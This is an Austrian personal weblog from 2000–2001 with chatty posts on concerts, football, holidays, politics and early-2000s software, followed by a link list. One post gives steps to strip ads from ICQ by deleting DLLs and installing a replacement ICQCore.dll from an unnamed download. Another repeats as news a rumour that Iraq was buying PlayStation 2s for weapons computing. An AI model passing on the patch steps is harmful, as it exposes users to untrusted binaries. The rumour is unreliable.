    letzten freitag pilgerten wir wie viele andere tausende patienten der belgischen wunderheiler in die ordination des grauens (aka libro music hall). ich, eine bis dahin noch nicht ganz ueberzeugte anhaengerin der musikalischen heilpraktiken, wurde ganz einfach innerhalb von 1,5 stunden assimiliert - jaja, so schnell kanns gehen! kurzum, das konzert war schlichtweg eine wucht. ich habe im laufe der letzten jahre doch einige bands live miterlebt und kann nun wirklich reinen gewissens sagen, dass placebo mit sicherheit das beste war, was ich bis dato zu ohren bekommen habe. allen skeptikern und moeglichen neidern :-) waere nahezulegen sich doch am besten selbst von der heilkraft zu ueberzeugen, die moeglichkeit dazu bietet sich beim diesjaehrigen forest glade festival!
    Der Auftritt des prototypischen Fußballprolo?   sTe  04.10.2001 13:56:17
    Fast. Hier handelt es sich immerhin um einen der besten Ex-Aktiven aller Zeiten, Diego Maradona. Der feuert mit allem was er hat seinen Stammverein Boca Juniors im Stadtderby gegen River Plate an - und auch das Töchterl ist durchaus engagiert bei der Sache. Im Umfeld der Partie kam es übrigens zu den in Argentinien fast schon obligatorischen Ausschreitungen. Ein Mann kam ums Leben.
    IQ EQ ...  babsi  04.10.2001 13:22:39
    im laufe meiner voruebergehend von viel freizeit (better known as: spending-money-u-dont-have-time!), arztbesuchen und stundenlangen aufenthalten auf diversen aemtern gepraegten tage, die zumeist vor dem computer beginnen und zu spaeterer stunde auch eben dort, manchmal auch in einem meiner lieblingslokale, enden, bin ich auf so manch interessanter website gelandet.
    zwangslaeufig findet sich natuerlich viel unansehnliches, uninteressantes und/oder schlichtweg unsinniges in den unendlichen weiten des www, vereinzelt aber doch die eine oder andere zumindest ein wenig reizvolle, weil das ewige streben nach mehr wissen weckende, seite. viel vergnuegen beim gruebeln!
    boeuf!!  sTe  04.02.2001 22:28:46
    nach einem geruhsamen samstag, entschlossen wir uns heute, fit, voller tatendrang und gestaerkt von den ersten fruehlingssonnenstrahlen, ein kleines abenteuer zu goennen. der plan war schnell geboren, und wir machten uns auf in die wiener praerie zum bueffeljagen.
    alle hindernisse konnten uns nicht abhalten, weder seuchenteppiche noch ca 20000 andere jaeger gegen die wir uns durchsetzten und dieses prachtexemplar erlegten.
    leider durften wir es nicht mitnehmen und so verliessen wir wieder hungrig die jagdgruende.
    was gabs noch,...ja am freitag verloren wir gegen holland (marcel war da..) trotz nummerischer ueberlegenheit im durchhaltevermoegen...:)
    morgen...  babsi  05.01.2001 13:09:46
    geht es endlich los, wir duesen fuer ganze 2 wochen auf die malediven, genauer gesagt nach sun island! was wir auf einer der groessten malediven-inseln, 1100x600m, insel auf der es nichts ausser weissem sandstrand, wunderschoenen korallenriffen und palmen gibt, machen werden? NICHTS, ausser vielleicht ein wenig: snorkeling water-skiing windsurfing sailing canoeing knee-boarding ringo-riding wake-boarding catamaran-sailing banana-riding fishing tennis squash ...!
    etwaigem frust, der sich nun vielleicht beim einen oder anderen gestressten, ueberarbeiteten und laengst urlaubsreifen leser einstellen koennte, werden wir gerne mit einem ausfuehrlichen reisebericht inkl. photos entgegenwirken :-)!
    wer haette das gedacht?  babsi  23.03.2001 10:50:06
    nach 15 jahren ist die raumstation mir, und jetzt kommt das erstaunlichste an der letzten mission - ohne schaden anzurichten - in den pazifik gestuerzt. mal ganz ehrlich: wer haette das gedacht? :-)!
    ihre letzte ruhestaette finden die einst als hightech-komponenten im einsatz gewesenen und nunmehrigen klumpen, in den unendlichen tiefen des meeres, wo bereits ueber 60 mehr oder minder absichtlich zum absturz gebrachte raumfrachter auf ihren neuen mitbewohner warteten.- zum glueck trennen wir, der umwelt stets tribut zollenden menschen, eifrig die bananenschalen von den pet-flaschen!
    nun gut, wer der westeuropaeischen berichterstattung vielleicht doch eher die original russische version des hergangs vorzieht, kann dies selbstverstaendlich auch tun - in diesem sinne: nazdaro:vje!
    some news and links  sTe  21.03.2001 18:20:33
    nachdem wir am vergangenem samstag mr.bull gebuehrend in sein
    3. jahrzehnt uebergefuehrt haben, sind hier clezis photos. weitere gibts hier.
    weiters wurde mir freundlichster weise ein neues mp3 spielendes mobiles zur verfuegung gestellt, worauf ich gleich auf die site des herstellers verweisen moechte, da mir diese ausserordentlich gefaellt.
    in neuem glanz?!? erstrahlt uebrigens auch GMX.
    und ein nettes flash spiel gibts auf fun.techradium.com (vor allem das golfende).
    technical friday !!!  sTe  19.03.2001 12:33:51
    am freitag durfte ich einer aeusserst interessanten ganztaegigen veranstaltung im marriott beiwohnen;
    microsoft lud zu einem .net vortrag von keinem geringeren als Don Box. abgesehen davon dass der typ unglaublich witzig ist, brachte er die materie phantastisch rueber.
    (im gegensatz zu seinem buch...)

    King of Horror  sTe  15.03.2001 16:13:25
    Das Grauen hat einen Namen. Im Kino nennt es sich „Hellraiser“, in einem Zweig der Literatur „Die Bücher des Blutes“ und auf dem PC ab sofort „Undying“! Ein Action-Adventure der "Gänsehautklasse"!
    Verantwortlich für diese Horror-Meilensteine zeichnet Clive Barker. Und gegen diesen Mann ist Steven King ein Schattenparker! Barkers Phantasien sind verstörender, seine Monster böser, bei ihm ist Blut einfach roter.
    Dieses Spiel ist nicht brutaler als andere Vertreter dieses Genres – es ist einfach intensiver :)
    new browsing   sTe  03.12.2001 18:27:34
    ...ist ab mittwoch fuer alle angesagt; dann gibts den ie6 als public preview!!!
    und sowohl nach meinung der fachpresse als auch nach meiner evaluierung ist eines klar: bereits die aktuelle version des ie6 zeigt, dass das microsoft-produkt keinen so blamablen start wie seine konkurrenz hinlegen wird.
    "Im Gegensatz zu Netscape surfen Sie nicht im Schneckentempo" tituliert zb. die pcwelt.

    ps: update fuer photoshop 6 gibts auch seit heute...
    concert!  sTe  03.12.2001 09:48:57
    nach langer zeit gabs freitags wieder mal ein ordentliches concert!!! die Deftones luden zum tanz, mit im gepaeck: Linkin Park , und Taproot.
    und was die noch nicht ganz ausgewachsenen jungs von linkin park zu harmlos waren, das hatten die deftones in 100facher intensitaet (fast) zuviel.
    ein schleppenderer klangteppich wurde von mir zuvor nie gehoert.
    es war phantastisch keine frage, nur einfach z-u-a-r-g!!!
    wir werden doch am ende nicht doch schon zu alt... :(
    ICQ Werbefrei  sTe  03.02.2001 12:50:24
    -HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs gehen und den Wert bei "Auto Update" von Yes auf No setzen.
    - die dateien icqateima32.dll, icqateimg32.dll, icqateres.dll aus dem ICQ Verzeichnis loeschen.
    - die datei ICQCore.dll von hier downloaden und ins ICQ Verzeichnis kopieren.....VOILA!!!

    PS: jeglichste modifikation am ICQ ist illgeal! wollte nur darauf hinweisen :)
    smoother als die Polizei erlaubt...  sTe  03.02.2001 10:10:57
    "du musst das haar nach hinten kämmen, und ohne sonnenbrille geht hier keiner aus dem haus".
    thats what they are: the fun lovin criminals

    sie sind um die 30, kommen aus new york und sind ein bestechendes beispiel für die sinnlosigkeit musikalischer schubladen.
    am 26. februar ist ihr neuester geniestreich "LOCO" erschienen. wieder die FLC wie sie leiben und leben - direkt aus new york.
    das ganze album groovt - entspannt, zurückgelehnt und ungezwungen...
    fuck das blaue pack !!!  sTe  16.02.2001 16:51:37
    die freiheitlichen haben den wahlkampf eroeffnet; und zwar mit folgenden slogans:
    "DROGEN: Ich bin selbst Mutter!"
    "VERKEHRSCHAOS: Auch ich ärgere mich täglich!"
    "KRIMINALITÄT: Auch ich will sicher leben!" und dann eben auch:
    "AUSLÄNDER: Ich verstehe die Sorgen der Wiener!"

    es ist zum KOTZEN, mir wird schlecht und ich geniere mich!!!

    amuesant hingegen folgende forderung:
    "Österreicher soll erst der werden, der zehn Jahre in Österreich lebt und einen Test mit Deutsch, Geschichte und Lebensstil besteht. "

    was auch immer der lebensstil test zu bedeuten hat! ausserdem muesste man dann mehr als die haelfte aller oesterreicher ausweisen!

    aber zum bruellen finde ich das mit der berittenen polizei !!!!!!!
    eXPerience !!!  sTe  14.02.2001 01:11:35
    YES !!! heute war die erste offizielle praesentation vom neuen windowsXP (codename whistler)! schaut verdammt nochmal phantastisch aus wie man sich bei
    Paul Thurrott ueberzeugen kann.
    PS.: der ie6 ist wirklich verdammt schnell :))
    all together !!!  sTe  13.02.2001 09:32:18
    nach einem doch eher anstrengenden :) wochenende, wo anlaesslich peters sponsion mehr als kraeftig gefeiert wurde, mich die schmerzen im nackenbereich noch immer quaelen, man allerorts diversen virenwarnungen (sowohl die echten als auch die virtuellen) genervt wird (wie kommt auch die ruski-barbie dazu), und wo sich musikgiganten kuenstlich aufspielen, macht und staerke zeigen wollen und im endeffekt ihr eigenes grab schaufeln, ist sonst eigentlich nicht viel passiert. vielleicht finde ich kommendes wochenende wieder mal ein wenig zeit, um mich um die weiteren channels zu kuemmern...
    no more asphalt !!!  sTe  03.06.2001 01:47:21
    PAVEMENT, eine der besten indierock-bands der welt, hat sich aufgelöst, bevor sie alt geworden ist!
    nach 10 jahren duerfen sie das auch...
    Da aber der saenger gleich ein solo-album nachschiesst muss ich nicht nicht allzu traurig sein; gottseidank durfte ich noch eines ihrer letzten konzerte in der brixton acadamy miterleben....; unvergesslich!!! thX missy!!!
    Der Beton für die Abwehrschlacht ist angeruehrt!!!  sTe  28.01.2001 19:11:28



    more 2 come...
    internet explorer 6 !  sTe  25.01.2001 18:53:47
    ...good news! auf techannel.de wird die aktuellste beta version vorgestellt. wie die tests ergeben, verblaest er seine konkurrenz weiter um laengen...:


    ©techannel.de
    etwas nostalgisches...  sTe  22.01.2001 12:40:06
    Seit kurzem befinden wir uns in einem neuen Jahrhundert und diesmal stimmts sogar. Aus sporthistorischer Sicht kann das abgelaufene mit Fug und Recht als das des Fußballs bezeichnet werden. Seit etwas mehr als hundert Jahren hat sich das Spiel, ausgehend von der britischen Insel, unaufhaltsam über die ganze Welt verbreitet. Seine Wurzeln können wohl nie eindeutig geklärt werden: mögen Entwicklungsstränge zu griechischen Dionysos-Orgien, ritterlichen Kriegsspielen, dem Calcio oberitalienischer Eliten oder volkstümlichen Fruchtbarkeits-Spielen, an denen ganze englische Dofverbände teilnahmen, nun beweisbar sein oder nicht.

    Sicher kann man sagen, dass gegen Ende des 19. Jahrhunderts ein von den Oberschichten um gefährliches übermäßiges Gewaltpotential bereinigtes, mit einigermaßen eindeutigem Regelwerk versehenes, und somit quasi zivilisiertes Spiel dem Volk zurückgegeben wurde. Die Proletarisierung stand also wohlgemerkt nicht am Anfang des modernen Fußballs, ließ allerdings auch nicht sehr lange auf sich warten und vollendete die Entwicklung des Spiels zum Massenphänomen. In den letzten Jahrzehnten hat - aufgrund verschiedener gesellschaftlicher und technischer Evolutionen - eine Entwicklung eingesetzt, als deren vielleicht prägnantestes Ergebnis das virtuelle Publikum genannt werden kann: dessen prototypische Ausprägung sitzt als fülliges Couchpotatoe im Rippunterleiberl, ausgerüstet mit Bier und Fahne, vor dem Fernseher und schwitzt mit seiner Mannschaft. (Ich weiß, diese Karikatur ist mittlerweile auch schon überholt - als Illustration funktioniert sie aber immer noch.)

    Die durch die massenmediale Vermittlung des Spiels ins praktisch unendliche potenzierte Kontaktchance der Wirtschaft mit potentiellen Verbrauchern, ging Hand in Hand mit einer beschleunigten Kommerzialisierung des fußballerischen Umfelds und einer korrespondierenden Machtverschiebung zu nichtsportlichen Organisationen. Durch Produkte wie die Champions League werden wir immer wieder unangenehm daran erinnert und viele Sympathisanten des Fußballs behaupten, wohl nicht ganz zu unrecht, er hätte seine Seele verkauft.

    Ganz so schlimm sehe ichs persönlich nicht, jedoch kommt bei mir wenn ich nur zb. an den Austragungsort der nächsten Fussball WM 2002 (Japan/Korea) und die durch die Zeitverschiebung bedingten Übertragungszeiten denke auch Ärger auf!

    Zumindest fieber ich schon jetzt zur Hälfte der Winterpause dem 2. Teil UNSERER Meisterschaft entgegen wo MEINE Mannschaft dank neuem Sponsor laut Trainer Bakke: kräftig unter Strom stehen wird.

    STRIKE!!! die kampfsau & co!  babsi  19.01.2001 15:47:12
    welch wunderbare eröffnung für das kitz-weekend. gestern noch meinte maier er wäre zwar mental gut eingestellt, hätte aber leichte probleme mit der kondition und siehe da, heute wieder alles anders. mit fast 1 sek vorsprung auf strobl und franz erschreddert sich die salzburger kampfsau ;-) den sieg im super-g! mal schauen was die morgige abfahrt so bringt. ein kitz, ein kamm, eine kampfsau, viele schweine, das eine oder andere stiegl-bier, a gscheide weisswurscht und geht scho :)!
    game, set, match...  sTe  17.01.2001 12:24:07
    ...und es fliegen wieder die gelben baelle; diesmal in down under genauer gesagt bei den australian open wo uns kournikova und die williams twins (welche ist nun welche) in anbetracht der 4375 grad, die es da unten immer hat, immer buntere und knappere einblicke in deren physis gewaehren;
    dass das nicht immer foerderlich ist zeigt uns mary pierce auf diesem bild. hat die nicht irgendwann mal diese kanadischen wunder-mukis-mach-wurzel gefressen :))
    alle anderen sieht man hier !!!
    Was steckt hinter der Abkürzung F.U.T?  sTe  15.01.2001 16:31:24
    in einem allseitsbekannten werbespot will herr kurt m. von dr. kurt o. wissen "Hasse Abkürzungen. C.I.A., F.U.T., A.B.S. , A.D.S.L. und jetzt auch noch A-Online Speed S.I. Was soll das?"
    hierbei handelt es sich ja eigentlich um aeusserst gaengige abkuerzungen; bis eben auf eine...; auch ich habe mich auf recherche begeben, ein befriedigendes ergebnis konnte mich bis jetzt jedoch noch nicht ereilen. F.U.D war aufzutreiben,...scheint mir in anbetracht eines oesterreichischen werbespots nur nicht sehr wahrscheinlich...:))
    und auch diese variante glaub ich nicht ganz...;
    genausowenig wie diese...
    just one life....  sTe  14.01.2001 03:45:17
    ...ja ich bin melancholisch,...jetzt,...,.warum wird vielleicht dem einen oder anderen verstaendlich sein; es geht um JOHNNY CASH !!! das klischee: man mag es oder nicht: ist weitgehend widerlegt, johnny laesst keinen kalt; ....ja es gibt auch cave und auch cohen...; nur cave und cohen mag man eben oder nicht; cash sagt, singt und tuts: I love songs about horses, railroads, land, judgement day, family, hard times, whiskey, courtship, marriage, adultery, separation, murdery, war, prison, rambling, damnation, home, salvation, death, pride, humor, piety, rebellion, patriotism, larceny, determination, tragedy, rowdiness, heartbreak and love. And mother. And God....thats it !?!
    nein ist es nicht, dazu kommt dass der mann weiss wovon er singt! warum ich das weiss ?!? ich hoer seine musik !!!! :))
    thx
    PS: klar hat er grad ein neues album rausgebracht, und hat auch noch u2 gecovert :)

    welcome to 2001...  sTe  01.12.2001 11:59:20
    nach vollzogenem jahreswechsel und halbwegs ueberstandener erkaeltung, gibts dank bully nochmals ein paar bilder zu romans polterabend. Und nach dem schock den uns Steve Jobs mit seinen neuen super-tollen-mega-kann-sogar-kaffee-kochen apples und dem wow-bin-ich-cool-und-bunt-und-jetzt-auch-noch-sooo duenn-design beschert hat, kann das jahr endlich produktiv los gehen, weil ja trotzdem der pc besser und schneller ist :P
    heit wird gschossn, jawoi...  sTe  31.12.2000 17:18:17
    ...dass die funken spruehn!!! rechtsstehend kann man unseren beitrag zum obligaten mitternachts krawall begutachten. gespannt darf man auf die sogenannten "hoellen-heuler" sein, welche im 10.bezirk in letzter sekunde aufgetrieben wurden!!!
    da auch diesmal kein y2k-bug droht, und auch die euro umstellung erst naechstes jahr von statten geht, sollte eigentlich alles klar gehen...
    ich hoffe jeder kommt gut rueber ins neue wirkliche jahrtausend, PROST, CHEERS & HAPPY NEW JEAR !!!!
    YES I WILL ...  sTe  30.12.2000 16:58:47
    als obs weihnachten und neujahr nicht genug zu feiern gaebe, so gabs dieses jahr als draufgabe noch eine hochzeit; sally und roman (....ja der schreiner-pepi...) sind die gluecklichen und wir durften mit ihnen feiern...! der dazugehoerige polterabend sollte natuerlich auch nicht fehlen und dass es lustig war gibts hier nachzuverfolgen...
    ich wuensche den beiden NUR DAS BESTE !!!
    Saddam hamstert PlayStation 2 für Kriegszwecke  sTe  19.12.2000 16:13:00
    Nach einem Bericht des Computerdienstes WorldNet Daily kauft der Irak im großen Stil Sony PlayStation 2 auf. WorldNet Daily beruft sich dabei auf Quellen innerhalb des FBIs. 4.000 Stück sollen so nach den Vermutungen des FBIs und des amerikanischen Zolls in den letzten drei Monaten aus den USA in den Mittleren Osten geschmuggelt worden sein. Das Magazin macht mit Saddam Hussein einen der beliebtesten Feinde der USA für die geringe Verfügbarkeit von PS 2 vor Weihnachten mitverantwortlich.
    Die Rechenkapazität einer PS 2 mit ihrem 128 Bit-Prozessor mit 300 MHz Taktrate übertrifft bei Grafikanwendungen eine durchschnittliche Grafik-Workstation um das Fünffache. Ein Cluster aus zwölf bis 15 PS 2 verfügt über genügend Rechenkapazität für die Steuerung einer Drohne zur Verteilung chemischer Kampfstoffe. Auch zur Berechnung von Flugbahnen von ballistischen Raketen oder die Simulation von nuklearen Explosionen könnte die PlayStations herangezogen werden, so die Quelle
    wie versprochen...  sTe  14.12.2000 11:19:29
    ...hier sind die photos aus amsterdam (click!!!!)
    ich hab gehört...  sTe  13.12.2000 15:07:31
    dass bill gates mitarbeiter, die privat netscape verwenden in der cafeteria in redmont öffentlich auspeitschen ließ um sie anschließend an den firmeneigenen pranger zu stellen. dann hab ich noch gehört, dass bill gates mit haider gemeinsame sache macht und überhaupt mit dem teufel im bunde ist. Er soll von verlässlichen zeugen dabei beobachtet worden sein, auf dem fußboden seines büros pentagramme und zaubersprüche mit kreide in einem flammenden kreis aus ziegenblut gemalt zu haben und währenddessen von unheimlichen schatten umflattert worden sein. weiters weiß ich zu berichten, dass bill gates dem papst ein hübsches sümmchen zahlen will, wenn der anordnet, das wort amen weltweit und in allen sprachen durch das wort microsoft zu ersetzen und den gläubigen mit ewiger verdammnis drohen lässt, wenn sie auch nur daran denken, netscape zu verwenden.
    zu allem überdruss weiß ich aus verlässlichen quellen, dass bill gates alle meine aktionen seit meiner geburt akribisch aufzeichnet und an die romulaner verkauft hat.

    Wirklich unverzeihlich !
    der link des tages  sTe  12.07.2000 13:03:46
    ...ist Am I Hot or Not.
    picture upload und ranking moeglichkeit :)
    back again !!!  sTe  12.07.2000 12:36:22
    abflug montag 1920 - ankunft sonntag 1535.
    dazwischen lagen 4 spannende tage und derer 2 entspannende. schon der erste conference day begann mit einer spannenden strassenbahnentgleisung, wohl- und gottweisslich ohne unserer beteiligung! wir mussten nur zu fuss 30min durch unbekanntes terrain latschen, um zum RAI-Kongress Bunker gelangen.
    was uns dort die naechsten tage an information zugetragen wurde, war wirklich beeindruckend und laesst das programmiererherz hoeher schlagen...ich sage nur: .net !!!
    ab freitag wars dann vorbei und wir konnten uns dem entspannenden teil widmen, der mit einem treffen mit einem alten freund (von nofro) begann! marcel, seineszeichens jetzt visual interface designer bei phillips.nl schleifte uns vom chinesen, ueber diverse bars in eine hollaendisch/touristische groell-bude!!!
    samstags gabs dann shopping, und abends dann den hoehepunkt: das KORSAKOF ! eine dreistoeckige heavy/speed-metal, grunge/grufftie, industrial, unfassbar laute dunkle bar, voll mit den entsprechenden typen.
    sonntag mittag war dann abflug, wir habens genossen!!!!
    ps:photos folgen...
    gone 4 adam!  sTe  27.11.2000 10:11:52
    heut gehts ab nach amsterdam; dort werden wir wieder mit wissen ohne ende (wroxconference) vollgestopft werden !!!
    wuensche allen eine schoene woche...
    Arnold to fight a woman in T3  sTe  22.11.2000 18:01:15
    Arnold Schwarzenegger reportedly stated that the bad terminator in Terminator 3 will be a woman...
    Arnold elaborated on the T3 female antagonist, saying that, "she can disappear, she can mold into someone else, and she is sometimes just an energy." And perhaps most impressive of all, she says exactly what she means without making you figure out how she really feels. This IS the most advanced terminator yet.
    Netscape 6 da, nicht da, doch da, leider doch da  sTe  14.11.2000 18:12:51
    nach einem verwirrspiel übers wochenende ist der langerwartete browser von AOL nun doch als final version erhaeltlich; doch ein wenig zeit mehr haette nicht geschadet;
    ich weiss nicht ob es sich um ein firmenpolitisches hickhack oder schlicht und ergreifend am unvermoegen der programmierer handelt, aber NS6 ist nicht zu gebrauchen;
    - die oberflaeche ist zugemuellt mit buttons und links
    - frames werden immer noch nicht korrekt dargestellt, auch nicht 100% CSS1 !!! kompatibel wie versprochen, auch das DOM ist nicht w3c konform
    - unheimlicher systemresourcen verbrauch (80% mehr als der IE)
    - nicht abwaertskompatibel zu frueheren NS versionen.
    - etc...
    auf allen bekannten foren wird nur mehr von BUGZILLA gesprochen, und selbst das MozillaZine (online mozilla site) hat sich selbst einen berichterstattungsstop ueber NS6 erteilt.
    vielleicht findet ja die linux gemeinde noch gefallen, doch auch aus dieser ecke erklingt schon leise unmut....
    also a whistler !!!  sTe  11.10.2000 15:18:59
    just installed windows whistler beta1 - the upcoming OS (which will likely be called Windows.NET 1.0 or Windows 2002 when it is released in the second half of 2001)! at the first glance it looks weird but nice...the administrative part is in my opinion the same as in win2000, everything else seems to be either new or a 9x relict....! the best thing is the XML-based "skinning" feature that will allow users to tailor the way their system looks in ways that were never before possible. its going to be stress tested during the weekend....stay tuned!
    » found 176 links...
    laola tv
    www.sos-orf.at
    orfblog -kontrollorgan
    SV Austria Salzburg
    Abkürzungen
    video.google.com
    Wikimedia Commons
    newspaperindex
    offizielle Fußball-WM 2006
    news.google.at
    last.fm
    New York Public Library
    Seventies Design
    subtitles
    colorscheme2
    The edge radio
    Flickr
    php-editors
    Photo Color Schemes
    crystal xp
    olympia scheduler
    random website
    iecapture
    icapture
    bincrawler
    Famous Fonts
    Usability Views
    typOasis
    Helene Black
    movie/bands fonts
    color schemes
    hoogerbrugge
    css @ happycog
    Domain Suffix
    Zope Newbies
    blindtexte
    VCDquality
    freephotoshop
    fontalicious
    bitmapmania
    stock.xchng
    chilli
    Wortschatz Lexikon
    XUL
    Mode2 CD (XCD)
    WebDev
    flogspot
    doom9
    Salzburger Sportler-Datenbank
    zoode
    TopXml
    adobeStudio
    freegraphics
    nypl style guide
    TvInfo
    TvTv
    zapmeta
    naturalborngolfers
    mozdev
    flashvoodoo
    tutorials.de
    css-discuss
    superhere
    linoleum studio
    nexbyte.com
    Flashblog
    Eric Meyers CSS Reference
    Twofifty
    Stereotypography
    ASPin
    endlessX
    asp/school
    Virus Landkarte
    The Color Schemer
    New York Public LibraryStyle Guide
    BestFlashAnimationsite
    mik::log howcomes
    the inspirational hypertext chamber
    13th Parallel
    Digital Web Zine
    SUPRA COMA
    netculture
    stereolab
    Pirated Sites
    INDEED!
    SQLXML
    Character Entity References
    tutorialfinder
    stilleye .development .web
    p3k.org
    msdos-commands
    Linguadict
    youngpup
    gotzeslinked
    wow webdesigns
    salon.helma
    netzministerium
    k10k
    Desktop Bonanza
    CSS Layout Techniques: for Fun and Profit
    browserwatch
    aspheute
    dhtml-zone
    bodytag
    JavaScript Section by Paul Koch
    zvon.org
    Netscape DOM Developer Central
    ultrashock
    easter egg site
    coming soon movies
    linkdub
    asp101
    vectorama
    find tutorials
    rottentomatoes
    moock - FLASH
    sonicnet
    gdivx
    web developers library
    neowin
    DVD RipGuide
    divX
    wincustomize
    WebFX
    5k contest
    stolendesign
    Browser Archive
    List of Known Spyware Infested Software
    Tutorial Times
    Hardcore .NET Articles Only
    ASPwire
    rinner.st
    CDcovers.cc
    nofrontiere
    MapBlast
    Sophos Virus Info
    OReillyNet
    FileFormats
    whatis?com - it specific encyclopedia
    evolt.org
    techannel.de
    xsl-mailinglist
    XML Cover Pages
    Digital Blasphemy - Wallpaper
    heinzl
    sensomatic
    turtschi
    DeviantArt
    DeskMod
    blindelirium
    Gnutella
    Audiogalaxy
    Bearshare
    skinz.org
    vcdhelp.com
    KMBY
    kurts DHTML
    ASP-HELP
    VBXML.COM
    XML School
    A Guide to XML and Its Technologies
    JavaScript FAQ Knowledge Base
    Dynamicdrive - dhtml scripts
    VB Script Reference
    ASP Today
    Wired WebMonkey
    Das dt. JavaScript-Verzeichnis
    Get Started With Cascading Style Sheets
    Ideenreich
    Web Reference
    JavaScript Tutorial & Free Scripts
    JavaScript Reference (ie & ns)
    Bratta DHTML
    DHTM Reference (ie)
    Dan Steinman DHTML
    Self Html